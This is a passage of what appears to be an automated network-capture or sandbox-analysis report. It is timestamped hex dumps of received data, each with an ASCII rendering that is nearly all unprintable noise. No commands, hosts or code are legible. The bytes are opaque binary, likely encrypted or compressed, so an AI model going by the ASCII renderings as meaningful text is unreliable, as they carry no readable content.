                                                                                                                  2023-08-03 15:59:56 UTC593INData Raw: ac da 7c b2 ef 18 cd 4c 08 c2 2b ad 87 12 5e 63 dd 9a ba 08 03 1b f3 f0 16 7d 0b e3 a9 e3 8f 01 f8 0c 24 84 95 83 dd 8b a6 5d e2 dc cf 61 85 ab 92 8f f6 42 e6 01 e7 30 27 9d 7a a1 0c 9b 2d 86 05 41 c2 03 a8 5c 11 2c 0d d8 e5 61 6c 6a e1 4b d5 98 75 bb 11 9a 21 d6 3c bf e4 2f 2b 13 52 a8 d8 33 ea a2 8e 45 76 21 d0 b1 00 00 7d 45 5d 42 3f 70 7e 9a 46 fc 63 ec 04 7e 88 1c a1 21 d4 64 33 a2 6a 02 8c 96 8f 06 2e 52 c6 28 17 0f a2 cd a4 7e 3b ac a4 1c 6b 32 ce 7e 21 2e 97 b6 a3 cb 83 4d 45 2e 8e 6b 44 bd 7a 2d 04 23 c8 0a 81 32 01 db 29 84 ca 12 b9 d6 2b 6b c4 f3 67 92 df ef ea c5 54 d3 d3 71 66 c0 4b 3f 69 61 61 99 70 30 12 90 cd 2c 29 4a 69 5b 3b 31 76 37 17 e6 71 64 99 85 51 8a c7 80 c1 59 6d 1f e8 cc 53 5f 10 bf 3f d4 6d 10 f9 ab e2 50 04 8e 5c de f6 5a 92
                                                                                                                  Data Ascii: |L+^c}$]aB0'z-A\,aljKu!</+R3Ev!}E]B?p~Fc~!d3j.R(~;k2~!.ME.kDz-#2)+kgTqfK?iaap0,)Ji[;1v7qdQYmS_?mP\Z
                                                                                                                  2023-08-03 15:59:56 UTC594INData Raw: 53 06 7f 5a 35 7a 09 44 e6 f2 67 65 09 13 a9 34 08 c3 d8 2a 07 1c 4e 94 ab be 31 35 8d 04 8c 53 d8 47 5f 1c 8f d1 e9 91 95 06 9b 38 b2 0f 50 dc 19 ac 4b 82 7a ed 1b e5 98 e1 6c 68 99 6a ea 57 1e b6 0c 96 16 5c 7a 4a ef c4 c1 b3 d4 6e 68 da 00 93 8e 82 bc 4a 5f 76 a8 23 3c 8e 2b aa c4 7b 51 6f c9 7a 93 d6 d2 48 01 15 a9 4c 13 03 c7 38 56 5e a9 d9 25 cd 43 2c b3 6d 6a a9 a7 63 b0 b3 d5 f5 71 93 34 52 b5 7a 79 63 ca 34 85 e6 fd f0 65 23 7f c6 95 a5 54 5b be 34 68 21 53 03 3b 7f 69 4a 5f 0d 01 a7 2d 91 71 7c ca e0 b1 16 de b1 35 db a1 61 82 eb 99 a9 32 b9 e7 f8 3d 62 11 32 ba a8 68 e1 36 e5 08 8e e6 33 4b c0 04 ed 9b 54 01 29 f5 fe 05 4c b6 8f ca 7f fa 8d 3d 2d 37 c1 98 0f 84 d0 11 8b bb 15 f8 bb 21 d0 e0 c0 b4 63 29 75 41 c8 37 45 1c 1b d4 37 77 5c 94 32 16
                                                                                                                  Data Ascii: SZ5zDge4*N15SG_8PKzlhjW\zJnhJ_v#<+{QozHL8V^%C,mjcq4Rzyc4e#T[4h!S;iJ_-q|5a2=b2h63KT)L=-7!c)uA7E7w\2
                                                                                                                  2023-08-03 15:59:56 UTC595INData Raw: f1 55 6c fd bd 05 19 b5 3e 20 db 09 bf 98 03 c0 c9 f6 86 2a d5 d9 50 36 7a c4 9e 41 39 37 13 5d 18 f8 17 96 51 ce 51 6d b7 ec 6b 9f b3 a1 6f 7f 9e 8f a5 ec a7 6b 36 56 bb 9b c1 85 23 7e d4 0f d2 24 67 e5 d8 ee 23 55 2d 1a e2 6b 7a 18 40 f0 b5 d7 b1 36 37 1a 71 b2 9a e4 93 e3 61 d2 58 4a 36 08 e3 b5 74 12 5c c5 d1 e3 c8 03 93 66 6c 01 d0 6f 21 40 89 6f 81 cf c4 41 c0 14 10 d7 8d 1d 2b 1c 23 b5 5f 0e 66 27 75 bb 9c 9a 67 88 d4 78 44 26 10 61 e9 d7 07 15 50 17 af 9e 1d e5 1a 99 75 e0 1f 84 4a 36 15 51 26 2e c5 4d ad 4a 88 41 ba 4d ce 58 5a 1b 25 a8 4f b8 bb 14 a2 82 e6 e5 64 16 1c a9 cf 8f c7 43 53 f4 fd 9d c0 08 92 e1 f2 97 ac e2 dc ec d6 25 a4 03 44 34 d9 0c 7e 3e 58 04 81 ca 0a ed 86 c7 94 5d ac f2 21 fb 58 0a 8b fb 73 38 da 51 54 b4 84 03 a0 77 5a d4 b7
                                                                                                                  Data Ascii: Ul> *P6zA97]QQmkok6V#~$g#U-kz@67qaXJ6t\flo!@oA+#_f'ugxD&aPuJ6Q&.MJAMXZ%OdCS%D4~>X]!Xs8QTwZ
                                                                                                                  2023-08-03 15:59:56 UTC597INData Raw: fe 2a 73 3e c2 ff df 0c 4b 72 0f c8 6b 7b 46 2d 8f 61 1d a7 c1 03 73 bf b5 ed 90 f3 70 43 51 bb a1 26 cd 91 b8 21 d9 4f cf f8 b7 39 4c 84 32 6e cf 51 45 e1 c4 c1 14 c2 26 61 67 da c3 7d 0f 71 74 80 b8 64 7b b5 c9 d7 56 69 66 9f 63 31 60 fe 30 81 b6 29 af e4 59 d3 c9 ba 2b b9 2f 26 b9 34 e8 84 78 21 d2 c5 04 51 ec 4b 21 73 30 7b 0f ae 4f 54 05 16 67 23 c4 27 7d f5 f2 ca b5 1e 3d 29 9a bd cb b9 5b 39 89 b1 42 d3 fb 07 65 f0 b2 18 fb ee 75 f9 1b 34 8a cf 87 d5 09 9b 18 76 df f2 c4 6e 4f 47 de 12 4f 1b eb b9 46 80 19 6a 3b 45 6a 3b 2b ed 3f 3d df a6 21 0c 51 9e 8c e6 4a 85 46 26 66 02 8d 07 32 1f 44 ea 97 38 fc 61 e3 9c 54 b7 35 54 db 0b 56 57 03 3d 99 13 f2 73 7a 40 58 7c 3f d2 a0 a7 5f d8 c4 e4 69 62 db 31 2c 80 1d 5b 22 80 dd 1f b7 66 81 2f 50 f0 ca e7 e1
                                                                                                                  Data Ascii: *s>Krk{F-aspCQ&!O9L2nQE&ag}qtd{Vifc1`0)Y+/&4x!QK!s0{OTg#'}=)[9Beu4vnOGOFj;Ej;+?=!QJF&f2D8aT5TVW=sz@X|?_ib1,["f/P
                                                                                                                  2023-08-03 15:59:56 UTC598INData Raw: 0e 61 f2 49 bf 7c f6 bc ef fe f6 5b e3 06 9d b1 95 27 5b a9 48 0d 45 c5 c1 72 de 62 ee be ac 36 78 68 2f e4 d0 4e 97 28 9c 2e c7 a1 6a de 3d fa 25 8f e8 f0 27 71 b5 24 5c 48 68 dc d5 d4 fb 87 8f 50 62 60 46 65 5b 24 e9 e0 53 1d ef 0c aa 62 a1 f1 44 98 8b 10 ab 3a 2c 39 0c cb b2 b8 b6 aa b9 ae 6f 33 75 49 85 73 71 19 35 4f 2b b6 a6 00 35 04 f5 f8 70 0e b5 84 ab 46 b6 b2 0e 4d c1 8d 01 55 d1 e8 be bc ff 81 0e 3c a6 3d 06 50 cd 4b 53 d6 f9 92 8c 3d 11 ec a4 45 6c df a7 3b cb 38 9e cc 4f 3e 31 16 ad db 46 c2 5a f1 ef 14 b2 b6 0c 5c bf 0b 70 6e d1 6b 6d 99 e1 43 c0 36 3c 82 3e f2 db 67 23 60 98 c1 1b 7b 89 6c cc 08 b8 89 e9 e9 ed 91 2a e3 c9 6b dd a3 5a 60 e5 1d 0a 38 04 d9 21 de 7f 41 c2 24 e0 bf cf 98 c9 28 7d 53 c6 ce d1 c9 c6 b2 b0 63 58 91 d5 7b bc 52 17
                                                                                                                  Data Ascii: aI|['[HErb6xh/N(.j=%'q$\HhPb`Fe[$SbD:,9o3uIsq5O+5pFMU<=PKS=El;8O>1FZ\pnkmC6<>g#`{l*kZ`8!A$(}ScX{R
                                                                                                                  2023-08-03 15:59:56 UTC600INData Raw: cc 7d 9d 8b cc 7e ff 51 49 76 75 7d 70 fc 48 47 f4 63 38 ed 34 f3 1e 85 b5 9e 6e 2c 5d 96 f7 1e 47 8f fd de 72 ba 3e c3 4d 4c fb 64 f5 82 8b cf 12 e9 27 22 ca 92 86 30 ea 47 c8 d0 47 83 7a 0a 65 d0 00 e4 21 35 1b bc 7a 40 04 0a ee 85 ef 5e 5f 92 88 92 50 aa d3 19 7a 21 f4 92 3e b6 fe 0e 33 e8 39 b8 b9 66 c8 43 dd c0 cd f7 50 b5 e8 25 43 91 58 87 7a 3a 62 ca 99 f7 6f d4 96 e4 df cd 10 3f 73 ba c0 49 ef 40 72 2e 38 cb c8 67 66 2e 9c 56 49 1d 71 02 87 bd a6 72 8a 55 53 88 04 67 ee 60 cd 3b fa 49 a3 4f a4 8d 3e 79 d2 d0 69 2f 3c cf 4c 47 26 75 fa a6 9e d6 b5 8e 8e 42 67 3d 5d 01 0f 8d 28 7b 13 c4 8f 2a d4 f6 c5 32 6c ef 2a 0b df 70 19 1f c0 c4 b5 cd 26 d8 cd 76 70 74 ae 38 fd 09 36 21 9e 6f 2c ea 50 d0 f0 53 6a 3b 40 77 b4 eb cf 6b f9 f6 c6 f6 d2 a6 c4 4d 69
                                                                                                                  Data Ascii: }~QIvu}pHGc84n,]Gr>MLd'"0GGze!5z@^_Pz!>39fCP%CXz:bo?sI@r.8gf.VIqrUSg`;IO>yi/<LG&uBg=]({*2l*p&vpt86!o,PSj;@wkMi
                                                                                                                  2023-08-03 15:59:56 UTC601INData Raw: 24 99 a5 6d dd 40 64 b9 05 eb 17 34 75 cf 01 25 a6 8e bb e5 73 fb 7b c9 ed 73 e6 9a 10 34 82 38 94 e9 13 e4 f9 c7 ea 21 69 99 26 56 83 83 62 9e a9 22 b0 71 b9 bc b3 15 2c 88 f7 a4 bb 35 28 05 aa 7f 0a 4e 99 6d d8 8c 92 06 a0 93 ae 0d 8f 71 76 5a 8d 7d 77 45 2b 08 8c 97 6b 45 5d c0 e3 89 b0 4a cd f1 3c 8b 9d 91 84 50 ba da 6e ac 87 3e 76 2a b4 4e eb da cd 00 22 68 5f 69 82 a9 4a 46 0c 6e 05 18 1c e0 ef 2c 2e cd 38 c3 38 93 60 e5 67 ef df c8 cf 7a 7a a2 62 84 df 84 a1 eb a5 3a 5f ea 48 7f aa 61 fe a5 72 90 40 e4 a1 aa 62 5f 96 d8 e1 f8 40 a3 88 36 c2 72 3d 89 31 93 a6 6e 55 aa f3 47 4b 75 81 65 27 7f 27 db 56 ec fd 21 fd 05 f1 47 2f 0d 05 6e b5 01 95 be 5c 52 89 6d 4e e1 c2 b2 f6 5e ef 9c 60 87 b1 b8 18 46 40 32 a7 8a 95 26 dc 02 8b f0 8d fe 77 d1 64 01 f6
                                                                                                                  Data Ascii: $m@d4u%s{s48!i&Vb"q,5(NmqvZ}wE+kE]J<Pn>v*N"h_iJFn,.88`gzzb:_Har@b_@6r=1nUGKue''V!G/n\RmN^`F@2&wd
                                                                                                                  2023-08-03 15:59:56 UTC602INData Raw: dd e0 b9 1c cd 14 1a fd 4f e3 63 03 20 20 2a 13 d2 d7 5c 1f 63 b7 9c c7 fd 04 7a d6 b0 a4 b5 d2 ac 51 d1 a7 be 0c cb b2 1e 2a ca 28 b3 05 b9 5e 5a b2 c0 92 e7 16 00 46 fd 41 31 c0 66 97 f7 9d ec d8 bd 22 f9 ef c6 96 52 43 4d de ff 80 35 68 25 01 e8 b8 97 0c a1 ed 29 f5 db e4 f0 07 7c 0d 52 f8 20 da 74 33 ea 46 d3 5d 41 69 85 df 5f 7a ba 53 1b 04 e7 e5 6b 9c df 2d c7 72 5a 38 b6 f2 3b 69 62 80 e8 a3 c3 db 6a 9e 03 ee 54 e5 7c 04 bd f5 18 bb d8 30 08 12 a1 33 35 72 6c 65 a7 d7 d2 40 cf a5 f2 29 3f d3 2e 4e 76 eb 0d ce 59 38 a1 c9 84 7b 32 0e 96 57 5a 73 71 4d 7d a3 63 dd f5 96 62 1b e7 c2 fd 9f 49 0b b0 00 cc 15 2a 9e 48 fd 76 2e d8 50 8a ff 21 80 2e cb d4 06 0d 9f 94 d0 94 36 a0 65 78 94 69 5b 27 ea 92 3d 6c 41 d8 8b 35 7e c7 a7 9f 6b f8 fd ad db 1f bd 3a
                                                                                                                  Data Ascii: Oc *\czQ*(^ZFA1f"RCM5h%)|R t3F]Ai_zSk-rZ8;ibjT|035rle@)?.NvY8{2WZsqM}cbI*Hv.P!.6exi['=lA5~k:
                                                                                                                  2023-08-03 15:59:56 UTC603INData Raw: 9e 1b ff 6b 82 fb 52 84 3a 5d 1e 99 f1 7b 25 11 b0 19 69 a7 54 3f d3 df 77 3d 6c 4c ef 35 9e 76 d6 3d df 65 15 ee e8 17 ea 0c 86 7c 71 33 99 43 df 0b 73 d0 0d 10 f9 52 2f 0e 9d d4 9a 91 87 27 e4 4b 03 5b c2 b8 39 4b ce 71 d6 df a6 90 2d 67 a2 33 80 34 aa c1 75 71 89 51 0c 95 1a 44 66 e6 d7 0d 63 ea ca f4 92 a5 91 15 36 c8 40 90 d4 a4 66 88 1e 76 3b 45 35 52 78 b0 5f 2f f9 02 7c 0d bd 94 b2 5b 80 f3 62 f1 90 5a 65 ac 25 2d 88 2e 96 20 23 92 76 a0 b0 01 c0 02 9b 72 25 d1 0e 77 83 c6 af d3 5a 61 a3 a7 36 05 d7 5d 9f da bd 94 7d b9 78 2f 12 66 a8 f3 94 40 c8 33 c0 5c 0e 71 8d c4 f6 7c 7b 44 39 12 86 72 7b 35 9b b3 4e 8c e4 11 ec 3c 90 10 87 40 9e b9 0f d5 e5 4a a2 73 c0 82 b2 37 a4 95 8b 82 8e 6f 9e d8 80 19 49 9a 87 87 82 81 f3 f9 a7 90 60 7e 58 50 d6 18 c9
                                                                                                                  Data Ascii: kR:]{%iT?w=lL5v=e|q3CsR/'K[9Kq-g34uqQDfc6@fv;E5Rx_/|[bZe%-. #vr%wZa6]}x/f@3\q|{D9r{5N<@Js7oI`~XP
                                                                                                                  2023-08-03 15:59:56 UTC605INData Raw: e6 04 e8 6f bb f5 53 55 d5 3e 0d c7 bc a5 27 dc 13 3e aa c0 0b 30 0d cb 4e 7c 20 d0 48 53 13 ef 7f 3d 09 ba 00 7c cb ee 5c 39 dc e6 12 53 a3 7e 61 cf ea 22 d9 fe f5 ff ee a8 79 13 42 f6 34 5e ea 06 65 39 d1 31 78 dd 1b a6 6e a7 0e 34 c8 e8 e6 63 9b c9 d2 b6 2b 63 41 ff 72 a9 47 87 c0 9e 6c e9 c0 38 c4 ed de 27 35 ad 77 07 45 53 32 b7 f9 32 3d ee 42 c9 36 47 17 87 5c 9a 9c 40 c5 a3 d8 d1 26 96 66 e5 3a 36 be 56 85 73 e0 fd ed 42 6a 6e 37 8b c2 53 ec a0 33 b8 20 3f ab cf 8f e7 39 21 56 34 70 7f 86 3c aa bb cd 65 5a 8e e6 2b 4e c6 50 04 e7 68 30 3d 5d c8 6a 7a 60 6b 6b 46 6e 8f 90 29 c0 09 9b 79 41 15 12 f8 de 75 d8 28 4a f6 70 30 fa 2e ac 08 41 90 c2 b3 34 9b 53 8f c6 3f 54 5a 00 85 36 50 f9 88 b8 e2 c4 6d f7 b5 f1 fa f9 c1 17 bc 85 2b 52 ed 62 3c b7 6c 20
                                                                                                                  Data Ascii: oSU>'>0N| HS=|\9S~a"yB4^e91xn4c+cArGl8'5wES22=B6G\@&f:6VsBjn7S3 ?9!V4p<eZ+NPh0=]jz`kkFn)yAu(Jp0.A4S?TZ6Pm+Rb<l
                                                                                                                  2023-08-03 15:59:56 UTC606INData Raw: 70 c4 4e 6e 79 7d 9b 88 71 f1 74 50 32 1e 0d 5c d6 33 7d 81 4f ba dd 14 6f f7 10 da 54 09 a1 f0 93 96 f9 92 36 29 57 ae b8 53 bc eb 63 e6 7d 59 0c 92 af 26 77 cb 39 ba df c1 70 19 67 ff d4 72 c5 0a 3f bf 6b d5 51 05 bf 7c c7 c2 3b 7e 47 84 fe 18 14 54 4c 20 1d f8 08 4f fe 07 33 1f 9f 98 80 f4 bb a4 3b ea ca b2 9e 67 93 b4 8a 9a c4 8b 3f 0d 0f 94 1b 7d fe 8a 16 a6 39 cd 82 7c 5d a1 8e 2f 0d c9 d9 d5 11 04 85 bc 95 a7 01 8b b8 50 48 68 eb e5 46 a0 98 d9 79 77 d7 b3 43 56 14 16 90 5b 87 73 46 a2 ad f8 00 eb 78 21 55 18 eb 81 68 24 06 78 41 02 86 97 b2 07 19 68 d4 dd 31 ae 6a 58 13 e2 d3 9b 68 6e 48 89 12 10 12 b8 88 6b 2e 62 3f af c0 ff ec 12 a2 4d ca 2b d3 43 76 41 eb 71 8f 44 53 bd 29 de ec da 94 00 03 59 18 d6 ae f0 9c 13 00 22 8b f3 90 31 49 d8 f8 9b a6
                                                                                                                  Data Ascii: pNny}qtP2\3}OoT6)WSc}Y&w9pgr?kQ|;~GTL O3;g?}9|]/PHhFywCV[sFx!Uh$xAh1jXhnHk.b?M+CvAqDS)Y"1I
                                                                                                                  2023-08-03 15:59:56 UTC607INData Raw: ac 40 7d b6 e8 52 22 1a cb e5 00 4a c1 46 d9 83 4f 9c 6a 16 1a 77 4a ed 17 60 30 5f 49 60 e0 a6 76 bd c9 8b 07 11 4f f3 e6 01 67 25 50 f7 cd 8c 26 d4 62 3b a5 89 f8 b2 2c c0 21 4a f5 f5 2e 5d d2 85 fb 39 ab 5d 1d 94 3a 9c 09 7f dd ec e8 0d 37 a3 44 c8 4e 73 b3 53 25 81 ea 87 33 55 f1 94 9c 40 74 40 86 4d 8e b9 df 5b 6a 9a 73 52 3c b4 fc 87 da d1 bb 48 85 ac 09 01 25 66 c7 1f d6 7c 1c 79 2d 33 f1 a8 aa e3 ab 0c 56 b3 7f 43 f2 6a e4 3b 97 21 d4 89 1c e7 ee 03 1f e9 d5 d6 db 2e d4 da 5f 08 b4 32 59 06 4a 10 3a 08 55 18 72 c4 cc 76 7e 3f 89 67 f3 2a 7c a4 31 55 ed 71 18 1d ee a5 a5 33 78 22 99 2b ba b3 ff ab c9 5b 07 cd d1 00 2b 7e 88 49 5a 10 fb a5 18 81 f6 ce 84 81 ee 1a 23 73 05 81 80 df b3 0d 64 59 c3 fa 59 a8 a5 81 aa f8 72 94 7b 6d f1 e5 fa ce 5b 4e 9c
                                                                                                                  Data Ascii: @}R"JFOjwJ`0_I`vOg%P&b;,!J.]9]:7DNsS%3U@t@M[jsR<H%f|y-3VCj;!._2YJ:Urv~?g*|1Uq3x"+[+~IZ#sdYYr{m[N
                                                                                                                  2023-08-03 15:59:56 UTC609INData Raw: be 52 be 6c a3 b9 f9 09 b1 51 04 23 2d 7b 1b d6 aa 72 cf d0 17 14 83 ff 0b 1d 47 8a ed 82 ef be f8 21 3a 25 ec 3a 2f ae 50 49 dd 0f 1f fd 0a 8b 34 d4 f8 ef 1d 76 c8 66 1f b9 8a a2 a5 f0 d2 de 9b e4 f0 25 cf a8 3d ab 77 5c 44 88 c4 ce c1 8b 61 ae 63 2f ec 08 9c e2 b9 9c 15 7c 82 36 37 29 b1 78 f5 30 0c cc e8 1d 57 23 ca 36 c9 bf 84 30 47 41 69 3a 3c ec 37 95 ff 64 87 e0 7a 0c 9c 46 44 17 f1 9c b9 33 bc 80 01 46 b0 32 4e 01 14 bf 20 e8 ec 85 06 53 c9 b7 42 00 8d d5 d2 45 53 ad c3 ed 3f 3b fa 62 58 d3 a8 11 01 e0 6c cb ee 11 cc f8 4a 92 94 e8 e4 9a b4 ff 87 74 42 e8 9b 66 ed 6c b7 1f 00 40 66 dd 98 6a 7b f4 a2 af 0b ce 26 54 3d ee 58 1c d3 0e ce 8d 88 bc 14 58 d1 99 86 26 37 07 1d 3f a7 61 a3 67 b1 07 2d b5 4b 2f ca 30 ba 4c 5c ec 7d aa 66 fd 89 38 4d 61 09
                                                                                                                  Data Ascii: RlQ#-{rG!:%:/PI4vf%=w\Dac/|67)x0W#60GAi:<7dzFD3F2N SBES?;bXlJtBfl@fj{&T=XX&7?ag-K/0L\}f8Ma
                                                                                                                  2023-08-03 15:59:56 UTC610INData Raw: b1 69 36 e9 f8 ca dd 20 9f b1 ef 3e 70 f0 54 0b f8 a5 10 0f 8a a0 40 75 e3 21 66 60 fc 58 25 81 b6 f9 86 79 f2 df 48 0f 7f 29 aa c0 bb 91 fd 32 ef 50 56 14 2f e3 96 9c c3 49 c0 d9 17 53 d4 0a 7b 25 a5 80 68 ae 81 8a 00 8f 96 46 91 9e 09 09 5f 7c c0 d0 38 e1 30 9e 23 c5 8d b3 51 52 6b f9 27 d2 3e 73 39 63 63 ae a3 dc 26 ac 9c 14 25 6a 22 3c 81 dc e7 dd d9 47 02 22 40 fb f9 10 ba b2 bd 62 37 5b 30 c4 71 75 b0 db 90 8b e9 04 63 4f 9b 15 fc d0 c6 6f 57 9d 46 a8 c7 77 7b 7f 1a c7 a2 62 be 97 38 21 1b 06 22 b1 92 22 b4 ed 9e b4 c7 05 c1 14 c5 34 eb b6 80 c2 1a 05 e6 94 b5 23 e5 57 e2 d1 7c b1 71 2d 35 6b c8 89 03 db ba bd 79 4f 45 be b6 34 8e e7 48 32 54 65 f2 7c 42 ed 42 cd 6c f0 0c f3 b2 3a 80 f9 1d 07 85 ff 47 f3 37 fd 0f 47 29 b2 1c 6a d6 7c 13 76 06 dd b1
                                                                                                                  Data Ascii: i6 >pT@u!f`X%yH)2PV/IS{%hF_|80#QRk'>s9cc&%j"<G"@b7[0qucOoWFw{b8!""4#W|q-5kyOE4H2Te|BBl:G7G)j|v
                                                                                                                  2023-08-03 15:59:56 UTC611INData Raw: 8e b5 53 f7 27 11 34 52 30 f6 87 ed 76 e7 7a 76 7c df 0a bf 31 ee 36 7c 41 be 43 ab 6e df 3a 4b 39 4b 32 a6 71 dc 3a ec ae 74 5d 43 43 14 4d 14 8c 5d 3a 31 dc 4a f0 9c 45 5f 2e 4a a8 3f ba b4 56 06 ff 63 c9 97 f9 bf 76 1b b3 34 76 1d 0a 74 8c 13 23 35 d8 c6 2e a1 de 2f 5d a8 c3 aa be 0e 53 fa bd e9 48 bf 15 a3 11 2b 5a 5b 2c 85 5b 4b b8 6a 97 72 d7 95 b9 18 ab 6f fb 3d 88 ce 2c fb 69 45 ff 61 a9 e9 7a e2 68 a0 f9 7c b4 d5 8a bf 8c ac a5 f5 92 15 c3 e3 dd 9f 45 a1 e9 b6 43 81 eb 83 e4 ec 10 9d ae d6 08 f0 48 66 63 ac af a1 eb 4b f1 8c 72 0c 00 4b 66 a0 b5 af c7 3e 96 1a 35 cd 11 c1 1b 07 ca d1 ca ef 1f cd a1 1d 77 0b 1a d8 4c 5f b1 cc 0e ed 44 c8 af 6b f2 1c 0d 1c 96 d3 09 f1 fb 95 be 43 90 c6 e1 78 c2 67 5a de 2e 9f c1 9d 8d b1 4a 7f 67 9d a6 3d 10 c5 b2
                                                                                                                  Data Ascii: S'4R0vzv|16|ACn:K9K2q:t]CCM]:1JE_.J?Vcv4vt#5./]SH+Z[,[Kjro=,iEazh|ECHfcKrKf>5wL_DkCxgZ.Jg=
                                                                                                                  2023-08-03 15:59:56 UTC613INData Raw: 17 e9 4d 38 2f 2d bc 69 88 d0 6d ae f0 e2 81 a6 13 ff 26 8c 13 61 de 01 88 4d 16 09 59 36 11 1d b9 3a e8 19 65 1d a7 73 91 08 84 1f 50 69 ab af 42 bd ba 5e 04 65 ea 22 2e 18 3f 03 81 16 24 c7 1f 56 0a 47 b8 90 ed 9f bc 23 32 9b d5 95 0c e0 27 a3 79 e8 1b 35 ff c0 1e 8c a9 24 58 3c 71 e3 3f 04 94 ca 3d ae e6 41 66 cf 43 5b 44 47 fe 7e c9 e4 14 d5 d6 53 c6 b7 4e 08 58 f8 f7 40 d6 29 16 ef d0 39 21 00 0e 7f 37 fc 7e 8e a8 af a8 54 ad 4b 50 d2 c1 b0 76 35 9c 3f 5a 96 6f 97 18 a5 29 b1 75 c7 68 24 6e 85 9a a3 95 22 f3 eb 63 93 a9 71 f4 64 a8 f7 38 88 5f 16 31 4b 0d d9 86 97 9a cf 9a ce dd 5e a3 65 8c a1 5d 97 6a 0b 49 93 f0 82 e3 20 7c 3f 61 8e 60 b0 66 b0 eb fe 96 d0 cc 10 31 f4 a8 62 11 21 a0 8b 3c a2 b4 8c 27 af 09 5b e4 1b 75 59 40 ed a0 9c e3 cb 8d 55 a3
                                                                                                                  Data Ascii: M8/-im&aMY6:esPiB^e".?$VG#2'y5$X<q?=AfC[DG~SNX@)9!7~TKPv5?Zo)uh$n"cqd8_1K^e]jI |?a`f1b!<'[uY@U
                                                                                                                  2023-08-03 15:59:56 UTC614INData Raw: 24 4c 1c d7 31 33 8c 6f b0 55 24 54 4b 8b 11 71 b7 e0 52 eb 7c d9 04 5a cd b0 cf 22 68 a0 df 03 0b e8 76 d0 ec e8 e2 0b 0e 5b 29 c1 15 e9 45 35 22 28 82 7e b5 fb e9 e7 20 3a 58 b5 7d f0 6f fa 3e 40 23 e4 5b b7 68 ae 70 45 0a bb cb cc c1 6c 4f d1 e5 b4 00 c7 a0 40 fa 87 91 c6 23 87 eb 02 d5 a1 9b 7f 53 ad 7a 74 23 ff b0 cc 89 99 65 cc ae 96 be a7 93 59 63 28 74 52 96 3d 2b 23 23 c5 c1 a2 22 88 e7 99 2b 6a 97 ed a7 d4 47 c0 30 a9 a5 3b b4 63 ee 89 6c be 11 b3 fc 38 3b 5e e0 36 e5 48 22 77 ed b7 b3 08 f2 7a 2a 9d 1d b5 d8 c0 d7 76 21 97 ba 58 bc 44 07 ba 9a 3d 42 cb 9f 02 f7 09 25 6f 00 be 50 5b e6 2c bd 2f 3b 51 17 53 3c 4f 31 28 e6 a4 fa 5c 1f ac a5 5e 2e db 3b 43 5b c9 4d ae 35 ac 37 26 1c 2f dc 34 9e cc 59 6e d0 04 4f dd 98 2c 7e 16 3c 9b 36 1e 6c 71 cd
                                                                                                                  Data Ascii: $L13oU$TKqR|Z"hv[)E5"(~ :X}o>@#[hpElO@#Szt#eYc(tR=+##"+jG0;cl8;^6H"wz*v!XD=B%oP[,/;QS<O1(\^.;C[M57&/4YnO,~<6lq
                                                                                                                  2023-08-03 15:59:56 UTC615INData Raw: 64 91 ec 03 9a 41 c4 3a 83 3f 14 cc 20 bb 5b 7a de b8 79 f3 b8 25 ec 34 55 d2 95 de 52 e3 80 f1 9f 13 e9 f7 be 66 d7 16 01 57 7a 52 f7 b4 05 d5 aa 21 78 b7 ce 7f 1b c5 af 95 3b 9e 9c f1 9f 2a f0 14 12 20 d7 22 14 7e b3 5b 3b 5d ab 3e 36 2d 94 83 ef 92 4f af 48 8e c2 12 31 b7 35 78 cf a6 a3 9b 55 53 63 48 e2 76 4e a3 8f 79 13 fa 24 da 45 64 0b db 71 b2 4b 71 c6 7d 86 cb 7c 09 d0 cd e4 3e 27 25 96 5f 4c 6a cc 72 8f 9e 88 b5 ae 1a cd 18 69 ad 48 08 93 09 28 56 64 3a 36 ad 3c 64 17 3b 2b ee 10 b2 1b 1f c1 a7 2d 68 4b 76 ba 08 8a fa 37 0f ee a3 3c f3 9c 2c 34 cc d5 97 a7 b5 65 45 9a 07 1f 46 04 a9 48 1e 54 d6 80 17 ff cf 69 7c ec de 01 a1 15 5a a3 73 4b 5d 98 73 92 98 2f 72 dd 24 0b d4 a3 a2 7d e1 fb 0f 0f 98 33 68 5d 3c 6a 47 dd bc 7d 2a 62 25 19 c7 f2 8b d5
                                                                                                                  Data Ascii: dA:? [zy%4URfWzR!x;* "~[;]>6-OH15xUScHvNy$EdqKq}|>'%_LjriH(Vd:6<d;+-hKv7<,4eEFHTi|ZsK]s/r$}3h]<jG}*b%
                                                                                                                  2023-08-03 15:59:56 UTC617INData Raw: f5 3c e2 ac 84 58 d1 6b a3 0f 73 a5 83 51 53 e4 02 fd 52 0b 69 de f4 ca 95 32 fa de 37 4f 37 3f 63 c7 8f cd 74 4e fe 43 39 37 89 65 8f d2 bf a6 57 fd 45 cc 3e a7 ce 76 8f a8 81 1d 99 ac a3 ae fb a9 cc f1 d2 8b 28 31 49 f4 ff d0 5e 66 0c 96 b7 e1 fd f1 b6 17 2f 02 53 28 24 de 7c aa 5d 50 f2 98 f7 04 4a 27 85 90 90 65 15 62 6b 02 d9 1d 89 c1 8c bc 7a 8c 16 95 47 7a c4 1f 42 b5 5f ad 8a e3 7b 98 c1 47 1a 24 0d e8 70 e7 5d 29 70 d1 c3 48 d8 5f 5a 45 34 c6 ed 0f 42 23 97 95 f6 f0 5d 3c 26 eb 0e c9 ca 5d 8c f3 85 99 95 2d 7c dd 6b f8 92 45 52 1f 79 30 1a ec 6f dc 24 41 9f d6 2f 1e 30 8b 3a 77 ed ba 7b 9f 90 f6 b4 ef 62 e5 b8 ec ca 8d 2c 0f 5e 49 ff 35 57 7b ee 87 a7 37 e9 c4 56 5e 61 b3 51 2f 5a a7 08 26 b1 0b 32 08 1b 2c 69 a7 11 0c 4c 09 66 db 9f 50 00 2b 1f
                                                                                                                  Data Ascii: <XksQSRi27O7?ctNC97eWE>v(1I^f/S($|]PJ'ebkzGzB_{G$p])pH_ZE4B#]<&]-|kERy0o$A/0:w{b,^I5W{7V^aQ/Z&2,iLfP+
